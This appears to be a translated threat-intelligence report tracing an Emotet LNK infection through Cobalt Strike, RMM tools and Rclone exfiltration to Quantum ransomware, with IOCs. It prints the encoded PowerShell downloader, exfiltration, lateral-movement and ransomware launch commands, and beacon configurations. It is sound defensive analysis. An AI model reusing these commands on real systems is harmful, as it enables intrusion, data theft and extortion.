Emotet 再次来袭——Lnk 文件导致全域勒索软件

逆向病毒分析 1年前 (2022) admin
510 0 0

2022 年 6 月,我们观察到一个威胁行为者通过 Emotet 获得了对环境的访问权并运行了八天。在此期间,使用CobaltStrike进行了多轮枚举和横向移动。利用远程访问工具用于命令和控制,例如Tactical RMMAnydesk威胁参与者的最终行动包括使用 Rclone 进行数据泄露和在域范围内部署 Quantum Ransomware。

我们在之前观察到EmotetQuantum的案例中观察到了类似的特征。

案例总结

入侵始于用户双击 LNK 文件,然后执行编码的 Powershell 命令将 Emotet DLL 下载到计算机上。执行后,Emotet会设置一个注册表运行密钥以在泄露的主机上保持持久性。

Emotet 然后继续使用 Windows 实用程序 systeminfo、ipconfig 和 nltest 针对网络的域控制器执行发现命令的简短列表。Emotet 进程将继续每天重复这些命令。执行后大约一个半小时,Emotet 开始发送垃圾邮件,邮寄新的恶意附件以继续传播。

第二天继续进行类似的活动,但在事件发生的第三天,Emotet将CobaltStrike可执行信标投放到泄露主机上。使用 Cobalt Strike 信标,威胁行为者开始进行新一轮的发现活动。运行 Windows net 命令,针对域组和计算机,再次执行 nltest,他们还使用 tasklist 和 ping 来调查远程主机。

威胁行为者随后移动到工作站。他们首先尝试使用 PowerShell 信标和主机上的远程服务执行此操作,但虽然脚本确实在远程主机上执行,但它似乎无法连接到命令和控制服务器。接下来,他们继续通过 SMB 将信标可执行文件传输到远程主机的 ProgramData 目录。然后通过 WMI 成功执行此信标并成功连接到威胁参与者服务器。

在这个新主机上,威胁参与者继续运行 net 命令以再次检查域管理员组。然后他们继续从主机上的 LSASS 进程转储凭据。通过进一步的进程注入,他们随后开始在整个环境中枚举 SMB 共享,并在找到主文件服务器时审查了服务器上存在的多个文档。这个 Cobalt Strike 服务器在那之后不久就停止了通信。

在入侵的第四天,Emotet 投放了一个新的 Cobalt Strike 信标。同样,为域管理员和域控制器服务器运行了一些网络命令发现。观察到从泄露主机到域控制器的一系列 netlogon 身份验证,作为利用域控制器的可能尝试。

然而,威胁行为者沿着更传统的路径前进,使用 SMB 文件传输和远程服务,使用 Cobalt Strike 信标 DLL 横向移动跨域控制器和环境中的其他几个服务器。在域控制器上,威胁参与者执行进一步的发现任务,运行find.batp.bat执行 AdFind 活动目录发现并在整个环境中执行 ping 扫描。

在其他目标服务器之一上,威胁参与者部署了 Tactical RMM,这是一种远程管理代理,用于在环境中进行额外的访问和持久化。从该服务器上,观察到威胁行为者使用 Rclone 从环境中的文件共享服务器中泄露数据。Mega.io服务被盗数据的发送地。

在入侵的第五天,威胁行为者再次出现,尝试使用 Rclone 再次从邮件服务器窃取一些数据,但这似乎失败了,威胁行为者没有尝试解决问题。在此之后,威胁者一直保持沉默,直到入侵的第八天也是最后一天。

在入侵的第八天,威胁行为者使用 Tactical RMM 访问环境,在受感染的主机上部署 Anydesk 。使用 Anydesk 建立连接后,攻击者随后投放SoftPerfect 的网络扫描程序并运行它来识别整个环境中的主机。

从那里开始,威胁参与者开始通过 RDP 连接到其他主机,包括备份服务器。选择新服务器并通过 RDP 连接后,攻击者放弃Powertool64.exedontsleep.exe准备他们的最终行动。最后,在主机上放置了locker.dll一个批处理文件,并执行了批处理文件,开始通过 SMB 将 Quantum 勒索软件部署到所有主机。1.bat从最初的入侵到勒索软件部署,历时 154 小时,历时 8 天。

部署勒索软件后,威胁参与者保持连接状态,并向其他几台服务器执行 RDP 并执行ProcessHacker.exenet 命令。在没有其他活动发生的情况下,我们评估这很可能是威胁行为者确认在网络上成功部署了勒索软件负载。

服务

在这种情况下,两台 Cobalt Strike 服务器都在我们的威胁源上(几天到几个月)在此入侵之前。

在我们的安全研究员和组织 服务下,我们还提供了此案例中可用的工件和 IOC,例如 pcaps、内存捕获、文件、事件日志(包括 Sysmon、Kape 包等)  。

时间线

报告负责人:@iiamaleks
分析和报告:  @samaritan_o@yatinwad

Emotet 再次来袭——Lnk 文件导致全域勒索软件

初始访问

初始访问采取 LNK 文件的形式,通过恶意垃圾邮件活动发送给受害者。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

嵌入在 LNK 中的 Powershell 脚本是一个 Base64 编码的脚本,其中各种组件分为不同的变量用于混淆目的。该脚本将自行解码,而不是依赖于 Powershell 的内置功能来执行编码脚本。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

....WindowsSystem32WindowsPowerShellv1.0powershell.exe -c "&{'p8ArwZsj8ZO+Zy/dHPeI+siGhbaxtEhzwmd3zVObm9uG2CGKqz5m4AdzKWWzPmKrjJieG4O9';$BxQ='uYnIvc3RhdHMvUkppMnJRSTRRWHJXQ2ZnZG1pLyIsImh0dHBzOi8vd3d3LmVsYWJvcm8ucGwvaW1ncy9KWkgyR0lIdG9PNy8iLCJodHRwczovL2VsLWVuZXJnaWFraS5nci93cC1pbmNsdWRlcy9JZHJWS09HWU1Rb2R1N0lsT0loLyIsImh0dHA6Ly9kcmVjaHNsZXJzdGFtbXRpc2NoLmRlL2ZvbnRzL1pBeVhic2YvIiwiaHR0cDovL2RobmNvbnN0cnVjY2lvbmVzLmNvbS5hci93cC1hZG1pbi9TbTAyWnNWRFlXZG9UYjdycUwvIiwiaHR0cDovL2RpbHNybC5jb20vcGhvbmUvcGZpcDVtLyIpOyR0PSJuZldGUSI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxqeEtQSXJNRnhKLk9PZjtSZWdzdnIzMi5leGUgIiRkXGp4S1BJck1GeEouT09mIjticmVha30gY2F0Y2ggeyB9fQ==';$KOKN='ICBXcml0ZS1Ib3N0ICJBcFBoUiI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cHM6Ly9kZXNjb250YWRvci5jb20';$KOKN=$KOKN+$BxQ;$GBUus=$KOKN;$xCyRLo=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($GBUus));$GBUus=$xCyRLo;iex($GBUus)}"

Powershell 脚本在双击(执行)时将尝试连接到一组包含 Emotet 恶意软件的域。成功下载 Emotet 恶意软件后,PowerShell 脚本会将其写入临时目录并通过regsvr32.exe.

Emotet 再次来袭——Lnk 文件导致全域勒索软件

值得注意的是,LNK 通过 NetBIOS 名称和以Virtualbox 上运行的系统black-dog开头的 MAC 地址来标识创建它的机器08:00:27

Emotet 再次来袭——Lnk 文件导致全域勒索软件

Machine ID: black-dog
MAC Address: 08:00:27:c6:74:5d
MAC Vendor: PCS SYSTEMTECHNIK
Creation: 2022-05-12 15:33:49

执行

LNK 文件中的 PowerShell 脚本成功执行后,Emotet 开始执行。Emotet 最初会将自己复制到用户临时文件夹中随机命名的文件夹中。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

在三天的时间内观察到Emotet引发的多个实例。几乎所有的 Emotet 实例都包含三个执行的枚举命令:

systeminfo
ipconfig /all
nltest /dclist:

在入侵的第三天和第四天,Cobalt Strike 作为 PE 可执行文件被放入磁盘并执行。此访问权限用于执行枚举并横向移动到其他主机。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

下图旨在说明具有多个 Emotet 实例导致 Cobalt Strike 的执行链。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

持久w

随着时间的推移,Emotet 恶意软件使用了各种持久性方法,可以在此处查看示例。

第一天,Emotet 通过运行密钥建立了持久性。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

如我们所见,regsvr32.exeWindows 的本机实用程序用于启动 Emotet DLL。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

在进入入侵的键盘操作阶段后,威胁行为者开始在整个环境中部署多个远程管理工具。Tactical RMM是第一个选择用于部署的工具。Tactical RMM 是一个远程管理软件平台,它使用代理组合来允许远程管理和访问系统。

该文件17jun.exe,已部署到其中一台服务器上的 programdata 文件夹中。然后由威胁参与者执行并导致安装主要 RMM 代理。使用以下命令完成安装。

"C:Program FilesTacticalAgenttacticalrmm.exe" -m install --api https://api.floppasoftware[.]com --client-id 1 --site-id 1 --agent-type server --auth 5bc5f5263224697ff9a653f8efa7e7d7a2ce341920a03c60e4823331b2508c

还为代理创建了一个服务

Emotet 再次来袭——Lnk 文件导致全域勒索软件

Event 7045
A service was installed in the system.

Service Name: TacticalRMM Agent Service
Service File Name: "C:Program FilesTacticalAgenttacticalrmm.exe" -m svc
Service Type: user mode service
Service Start Type: auto start
Service Account: LocalSystem

tacticalrmm.exe客户端一起,安装了第二个可执行文件 calledmeshagent.exe,来处理远程会话交互,并为该代理创建了一个单独的服务。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

Event 7045
A service was installed in the system.

Service Name: Mesh Agent
Service File Name: "C:Program FilesMesh AgentMeshAgent.exe"
Service Type: user mode service
Service Start Type: auto start
Service Account: LocalSystem

在入侵的最后一天,威胁参与者将 AnyDesk 添加到运行 Tactical RMM 的同一台服务器,在部署勒索软件之前提供了一种额外的访问方式。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

Event 7045
A service was installed in the system.

Service Name: AnyDesk Service
Service File Name: "C:Program Files (x86)AnyDeskAnyDesk.exe" --service
Service Type: user mode service
Service Start Type: auto start
Service Account: LocalSystem

特权升级 

我们怀疑针对域控制器的 ZeroLogon 漏洞利用失败,源自运行 Cobalt Strike 的滩头主机。一个指标是 Mimikatz Zerologon 实现使用的 Netlogon 事件中的“mimikatz”字符串。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

在几秒钟内,观察到来自单一来源的流量中的多个 NetrServerReqChallenge 和 NetrServerAuthenticate2 方法,这是Zerologon 尝试的指标之一。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

防御闪避

进程注入

观察到威胁行为者将进程注入合法进程并使用它们在系统上执行自己的任务,这可以从 Winlogon 连接到与 Cobalt Strike 服务器关联的域并从系统中删除文件中看出。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

用于注入外部进程的具体机制是将任意代码注入其内存空间,并将其作为远程创建的线程执行。这是从 rundll32.exe 发生的,它以前用于执行和运行 Cobalt Strike。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

下表总结了这种情况下用于注入的过程:

Injected Process Name Injection Payload
C:Windowssystem32winlogon.exe Cobalt Strike
C:WindowsSystem32RuntimeBroker.exe Cobalt Strike
C:WindowsSystem32svchost.exe Cobalt Strike
C:WindowsSystem32taskhostw.exe Cobalt Strike
C:Windowssystem32dllhost.exe Cobalt Strike


PowerTool

在用于部署勒索软件负载的服务器上观察、删除并执行了 PowerTool。此工具具有终止进程、删除其进程文件、卸载驱动程序和删除驱动程序文件的能力。据报道,它已被几个勒索软件组织用来帮助他们的行动

Emotet 再次来袭——Lnk 文件导致全域勒索软件

作为执行的副产品,PowerTool 会将驱动程序放入磁盘并将其加载到系统中。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

Driver Signature Name: 北京华林保软件技术有限公司

指标删除

观察到威胁行为者正在删除已丢弃到磁盘的文件

Emotet 再次来袭——Lnk 文件导致全域勒索软件

凭据访问

观察到对 LSASS 的进程访问,可能会从注入 Cobalt Strike 的进程中转储凭据。正如我们在之前的报告中所述,授予访问级别与访问值为 0x1010 (4112) 的 Mimikatz 的已知指标相匹配

Emotet 再次来袭——Lnk 文件导致全域勒索软件

我们还观察到 Cobalt Strike 可执行文件请求访问级别为 0x0040 (64) 的 LSASS,并表明威胁参与者可能正在使用其他凭证访问工具。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

扩散

在最初的 Emotet 执行期间,观察到三个自动发现命令。然后重复这些,每天从 Emotet 宿主那里看到一次。

systeminfo
ipconfig /all
nltest /dclist:

负责枚举 Active Directory 组、加入域的计算机和域信任的多个命令是通过滩头阵地上的 Cobalt Strike 执行的。

whoami /groups
net group /domain
net group "domain computers" /domain
net group /domain "Domain controllers"
net group "domain admins" /domain
nltest /trusted_domains

威胁行为者被观察到查询一个不存在的组Domain controller,,然后是一个命令来纠正查询该组的错误Domain controllers

net group /domain "Domain controller"
net group /domain "Domain controllers"

在尝试横向移动之前观察到向用户工作站和域控制器发出的 ping 命令。

ping COMPUTER.REDACTED.local

Invoke-ShareFinder通过 Cobalt Strike 的注入过程观察到在环境中通过 Powershell 使用:

Emotet 再次来袭——Lnk 文件导致全域勒索软件

除了Invoke-ShareFinder命令之外,还观察到脚本使用的其他功能。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

Invoke-ShareFinder通过在短时间内持续查询每个主机的“ADMIN$”和“C$”份额,也可以在网络上看到的残余。除了这些共享之外,还访问了一些来自文件服务器的共享。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

在域控制器上,运行了两个批处理文件。第一个find.bat用于运行 AdFind.exe 以进行 Active Directory 发现。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

find.exe -f "objectcategory=computer"
find.exe -f "(objectcategory=organizationalUnit)"
find.exe -subnets -f (objectCategory=subnet)
find.exe -f "(objectcategory=group)"
find.exe -gcb -sc trustdmp

第二个脚本p.bat,运行以使用 ping 扫描网络,寻找网络连接和在线主机。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

在最后一天,在部署赎金之前,netscan.exe攻击者还登陆了服务器,并从 Tactical RMM meshagent.exe 会话中执行了它。

C:WindowsSystem32mstsc mstsc.exe /v:IP_ADDRESS_1
C:WindowsSystem32mstsc mstsc.exe /v:IP_ADDRESS_2
C:WindowsSysWOW64explorer.exe "C:WindowsSysWOW64explorer.exe" \IP_ADDRESS_1C$
C:WindowsSysWOW64explorer.exe "C:WindowsSysWOW64explorer.exe" \IP_ADDRESS_2C$

横向运动

Cobalt Strike 远程服务创建

观察到威胁行为者创建远程服务,以便在远程主机上以 SYSTEM 身份执行通过 SMB 传输的信标 DLL 文件。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

C:WindowsSystem32cmd.exe /c rundll32.exe C:ProgramDatax86.dll, StartA

WMI

在另一个实例中,可执行的 Cobalt Strike 信标通过 SMB 复制到目标机器,然后通过 WMI 执行。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

wmic /node:IP_Address process call create "cmd.exe /c start C:Progradatasc_https_x64.exe"

远程桌面

最后,在入侵的最后一天和勒索软件部署期间,在多台用于横向移动的受感染主机上发现了 RDP(远程桌面协议)连接痕迹。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

收集

在入侵的第三天,在横向移动之后,威胁行为者开始审查存储在网络共享上的敏感文件,包括收入、保险和密码存储文件。

在入侵的最后一天,威胁行为者再次审查了这些文件。后来,威胁者在网络外查看了被盗文件,通过触发的金丝雀令牌观察到,这揭示了来自 AWS EC2 实例的连接。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

命令与控制

表情符号

Emotet 加载器从以下域中提取主要的第二阶段有效负载:

hxxps://descontador[.]com[.]br
hxxps://www.elaboro[.]pl
hxxps://el-energiaki[.]gr
hxxp://drechslerstammtisch[.]de
hxxp://dhnconstrucciones[.]com[.]ar
hxxp://dilsrl[.]com

第二阶段加载程序在其配置中有多个 IP 地址以尝试连接到:

103.159.224.46
103.75.201.2
119.193.124.41
128.199.225.17
131.100.24.231
139.59.60.88
144.217.88.125
146.59.226.45
149.56.131.28
159.89.202.34
165.22.211.113
165.227.166.238
178.128.82.218
209.126.98.206
213.32.75.32
37.187.115.122
45.226.53.34
45.55.134.126
46.55.222.11
51.210.176.76
51.254.140.238
54.37.70.105
82.223.82.69
91.207.181.106
92.114.18.20
94.23.45.86
96.125.171.16

Cobalt Strike

观察到正在使用以下 Cobalt Strike C2 服务器。观察到使用了 HTTP 和 HTTPS。

139.60.161.167 (survefuz[.]com)
139.60.160.18 (juanjik[.]com)
139.60.161.167 (survefuz[.]com)
JA3s: 211897664d51cffdfd7f78d684602ecc
JA3: a0e9f5d64349fb13191bc781f81f42e1
Certificate: 03:4e:01:cb:d0:d4:40:24:ad:e0:cd:81:9f:00:44:0f:1e:de
Not Before: May 24 11:25:15 2022 GMT
Not After: Aug 22 11:25:14 2022 GMT
Issuer Org: Let's Encrypt
Subject Common: survefuz[.]com
Public Algorithm: id-ecPublicKey
139.60.160.18 (juanjik[.]com)
JA3s: 211897664d51cffdfd7f78d684602ecc
JA3: a0e9f5d64349fb13191bc781f81f42e1
Certificate: 04:ea:aa:59:1e:c6:50:6e:d3:70:d4:24:50:f0:a5:30:9a:e6
Not Before: Jun 14 17:38:08 2022 GMT
Not After: Sep 12 17:38:07 2022 GMT
Issuer Org: Let's Encrypt
Subject Common: juanjik[.]com
Public Algorithm: rsaEncryption

以下是观察到的 Cobalt Strike 配置:

139.60.161.167 (survefuz[.]com)

{
"beacontype": [
"HTTP"
],
"sleeptime": 45000,
"jitter": 37,
"maxgetsize": 1403644,
"spawnto": "AAAAAAAAAAAAAAAAAAAAAA==",
"license_id": 206546002,
"cfg_caution": false,
"kill_date": null,
"server": {
"hostname": "survefuz[.]com",
"port": 80,
"publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqoyVkBHx713LeUHmw7FAozt15LWTMgX1nCLSXECllryUTD8E7tTjJLIy4Hg27yiG56NFyXzCzL70T7HPzWGd7fJN1H5exgB19psw4c1qwuqkWLlO8GDOT6gFzQwY0FA/eKvDfgxatj387yoR2U+hfo0I0GiO4x4V7c9ow/OlHXwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="
},
"host_header": "",
"useragent_header": null,
"http-get": {
"uri": "/jquery-3.3.1.min.js",
"verb": "GET",
"client": {
"headers": null,
"metadata": null
},
"server": {
"output": [
"print",
"append 1522 characters",
"prepend 84 characters",
"prepend 3931 characters",
"base64url",
"mask"
]
}
},
"http-post": {
"uri": "/jquery-3.3.2.min.js",
"verb": "POST",
"client": {
"headers": null,
"id": null,
"output": null
}
},
"tcp_frame_header": "AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
"crypto_scheme": 0,
"proxy": {
"type": null,
"username": null,
"password": null,
"behavior": "Use IE settings"
},
"http_post_chunk": 0,
"uses_cookies": true,
"post-ex": {
"spawnto_x86": "%windir%\syswow64\dllhost.exe",
"spawnto_x64": "%windir%\sysnative\dllhost.exe"
},
"process-inject": {
"allocator": "NtMapViewOfSection",
"execute": [
"CreateThread 'ntdll!RtlUserThreadStart'",
"CreateThread",
"NtQueueApcThread-s",
"CreateRemoteThread",
"RtlCreateUserThread"
],
"min_alloc": 17500,
"startrwx": false,
"stub": "yl5rgAigihmtjA5iEHURzg==",
"transform-x86": [
"prepend '\x90\x90'"
],
"transform-x64": [
"prepend '\x90\x90'"
],
"userwx": false
},
"dns-beacon": {
"dns_idle": null,
"dns_sleep": null,
"maxdns": null,
"beacon": null,
"get_A": null,
"get_AAAA": null,
"get_TXT": null,
"put_metadata": null,
"put_output": null
},
"pipename": null,
"smb_frame_header": "AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
"stage": {
"cleanup": true
},
"ssh": {
"hostname": null,
"port": null,
"username": null,
"password": null,
"privatekey": null
}
}
139.60.160.18:80 (juanjik[.]com)


{
"spawnto": "AAAAAAAAAAAAAAAAAAAAAA==",
"dns_beacon": {},
"smb_frame_header": "AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
"post_ex": {
"spawnto_x64": "%windir%\sysnative\dllhost.exe",
"spawnto_x86": "%windir%\syswow64\dllhost.exe"
},
"stage": {
"cleanup": true
},
"process_inject": {
"stub": "yl5rgAigihmtjA5iEHURzg==",
"transform_x64": [
"prepend '\x90\x90'"
],
"transform_x86": [
"prepend '\x90\x90'"
],
"startrwx": false,
"min_alloc": "17500",
"userwx": false,
"execute": [
"CreateThread 'ntdll!RtlUserThreadStart'",
"CreateThread",
"NtQueueApcThread-s",
"CreateRemoteThread",
"RtlCreateUserThread"
],
"allocator": "NtMapViewOfSection"
},
"uses_cookies": true,
"http_post_chunk": "0",
"ssh": {},
"maxgetsize": "1403644",
"proxy": {
"behavior": "Use IE settings"
},
"tcp_frame_header": "AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
"server": {
"publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCbFjn9w4cE3slYf3jYqTw3S+6HxAGZd3cMpTqKnDsmGAmCsll4R4jp5yz2SnrpRz8brvoZNotuWhqu71R0FqaAkaaheF5MrOHJBbCvGKDu4m6RZ0DHicJCpj6YIm0FLHNNZugHhV5Ou9lZaseCTECMnk0rXiwTsiRWv9ikRccwHwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"port": "443",
"hostname": "juanjik[.]com"
},
"beacontype": [
"HTTPS"
],
"license_id": "206546002",
"jitter": "37",
"sleeptime": "45000",
"http_get": {
"server": {
"output": [
"print",
"append 1522 characters",
"prepend 84 characters",
"prepend 3931 characters",
"base64url",
"mask"
]
},
"client": {
"metadata": [],
"headers": []
},
"verb": "GET",
"uri": "/jquery-3.3.1.min.js"
},
"cfg_caution": false,
"host_header": "",
"crypto_scheme": "0",
"http_post": {
"client": {
"output": [],
"id": [],
"headers": []
},
"verb": "POST",
"uri": "/jquery-3.3.2.min.js"
}
}
139.60.160.18:443 (juanjik[.]com)


{
"spawnto": "AAAAAAAAAAAAAAAAAAAAAA==",
"dns_beacon": {},
"smb_frame_header": "AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
"post_ex": {
"spawnto_x64": "%windir%\sysnative\dllhost.exe",
"spawnto_x86": "%windir%\syswow64\dllhost.exe"
},
"stage": {
"cleanup": true
},
"process_inject": {
"stub": "yl5rgAigihmtjA5iEHURzg==",
"transform_x64": [
"prepend '\x90\x90'"
],
"transform_x86": [
"prepend '\x90\x90'"
],
"startrwx": false,
"min_alloc": "17500",
"userwx": false,
"execute": [
"CreateThread 'ntdll!RtlUserThreadStart'",
"CreateThread",
"NtQueueApcThread-s",
"CreateRemoteThread",
"RtlCreateUserThread"
],
"allocator": "NtMapViewOfSection"
},
"uses_cookies": true,
"http_post_chunk": "0",
"ssh": {},
"maxgetsize": "1403644",
"proxy": {
"behavior": "Use IE settings"
},
"tcp_frame_header": "AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
"server": {
"publickey": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCbFjn9w4cE3slYf3jYqTw3S+6HxAGZd3cMpTqKnDsmGAmCsll4R4jp5yz2SnrpRz8brvoZNotuWhqu71R0FqaAkaaheF5MrOHJBbCvGKDu4m6RZ0DHicJCpj6YIm0FLHNNZugHhV5Ou9lZaseCTECMnk0rXiwTsiRWv9ikRccwHwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
"port": "80",
"hostname": "juanjik[.]com"
},
"beacontype": [
"HTTP"
],
"license_id": "206546002",
"jitter": "37",
"sleeptime": "45000",
"http_get": {
"server": {
"output": [
"print",
"append 1522 characters",
"prepend 84 characters",
"prepend 3931 characters",
"base64url",
"mask"
]
},
"client": {
"metadata": [],
"headers": []
},
"verb": "GET",
"uri": "/jquery-3.3.1.min.js"
},
"cfg_caution": false,
"host_header": "",
"crypto_scheme": "0",
"http_post": {
"client": {
"output": [],
"id": [],
"headers": []
},
"verb": "POST",
"uri": "/jquery-3.3.2.min.js"
}
}

Tactical RMM Agent

威胁行为者在其中一台服务器上放置了一个Tactical RMM Agent,作为访问网络的替代命令和控制途径。在安装软件的过程中,观察到如下命令:

"C:Program FilesTacticalAgenttacticalrmm.exe" -m install --api https://api.floppasoftware[.]com --client-id 1 --site-id 1 --agent-type server --auth REDACTED

此命令揭示了floppasoftware.com威胁参与者用于远程管理 Tactical RMM Agent 的域。该域的注册时间非常接近此事件的时间线。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

注册用于 Tactical RMM Agent 的域将同时具有apimesh子域,在本例中api.floppasoftware[.]commesh.floppasoftware[.]com它们都托管在同一服务器 IP 上:212.73.150.62。

此外,在执行 Tactical RMM Agent 期间,该软件将连接到一个集中域以检索当前使用的公共 IP 地址:

icanhazip.tacticalrmm.io

AnyDesk

在入侵的最后一天,AnyDesk 部署在他们之前安装了 Tactical RMM 的服务器上。使用此 RMM 代理,他们继续在主机上安装 AnyDesk。从 meshagent.exe 观察到以下进程活动。

MeshAgent.exe -kvm1
- Initiating Process File Name, column 6, row 12
"MeshAgent.exe" -b64exec cmVxdWlyZSgnd2luLWNvbnNvbGUnKS5oaWRlKCk7cmVxdWlyZSgnd2luLWRpc3BhdGNoZXInKS5jb25uZWN0KCczNzQ3Jyk7

解码的 base 64 内容揭示了控制台访问和连接操作的命令。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

然后是以下流程:

Emotet 再次来袭——Lnk 文件导致全域勒索软件

下载并安装后,攻击者会启动与 AnyDesk 主机的连接

Emotet 再次来袭——Lnk 文件导致全域勒索软件

Client-ID: 752733537 (FPR: 27ac27e2c9ed)
Logged in from 84.17.49.114:1249

渗透

在我们上一份关于 Emotet的报告中也看到,威胁行为者利用 Rclone 将数据泄露到 Mega ( Mega.nz ) 存储服务。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

rclone.exe  copy "\SERVER.domain.namepath" mega:1 -q --ignore-existing --auto-confirm --multi-thread-streams 6 --transfers 6
rclone.exe copy "\SERVER.domain.namepath" mega:2 -q --ignore-existing --auto-confirm --multi-thread-streams 6 --transfers 6

从 rclone.conf 文件中,威胁参与者留下了正在使用的远程帐户的详细信息。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

[email protected]

在 Netflow 的帮助下,我们确定至少有约 250MB 的数据从环境中泄露出来。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

影响

垃圾邮件

在前两天,Emotet 通过 SMTP 发送出站垃圾邮件:

Emotet 再次来袭——Lnk 文件导致全域勒索软件

以下是用于发送电子邮件的 SMTP 流量示例,以及与附加 XLS 一起发送的提取的 EML:

Emotet 再次来袭——Lnk 文件导致全域勒索软件

勒索软件

在入侵的最后一天,威胁行为者做好了将勒索软件部署到域的准备。他们首先通过 RDP 从他们刚刚使用Tactical RMM部署 Anydesk 的服务器连接到新服务器。建立 RDP 连接后,他们部署Powertool64.exe,可能会阻止任何安全工具的干预,并启动软件DontSleep

Emotet 再次来袭——Lnk 文件导致全域勒索软件

Don’t Sleep 能够防止计算机关机和用户注销。这样做可能是为了确保不会干扰勒索软件有效负载的传播。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

最后,在 Don’t Sleep 运行的情况下,攻击者执行了一个名为“1.bat”的批处理脚本。该脚本调用了主要的勒索软件负载 locker.dll,并将域中所有计算机的列表传递给目标参数。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

rundll32.exe locker.dll,run /TARGET=\HOST1.DOMAIN.NAMEC$ /TARGET=\HOST2.DOMAIN.NAMEC$ /TARGET=\HOST3.DOMAIN.NAMEC$ /login=DOMAINAdministrator /password=[REDACTED] /nolog /shareall

可执行文件开始加密环境中的所有目标主机并释放勒索字条:README_TO_DECRYPT.html

Emotet 再次来袭——Lnk 文件导致全域勒索软件

在调用勒索软件负载后,大约一分钟后,威胁参与者启动了 Process Hacker。我们认为这是为了监控勒索软件负载的执行。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

域中的所有系统都已加密并显示了勒索信息。

Emotet 再次来袭——Lnk 文件导致全域勒索软件

Indicators

Atomic

Emotet Deployment Domains
descontador[.]com[.]br
www.elaboro[.]pl
el-energiaki[.]gr
drechslerstammtisch[.]de
dhnconstrucciones[.]com[.]ar
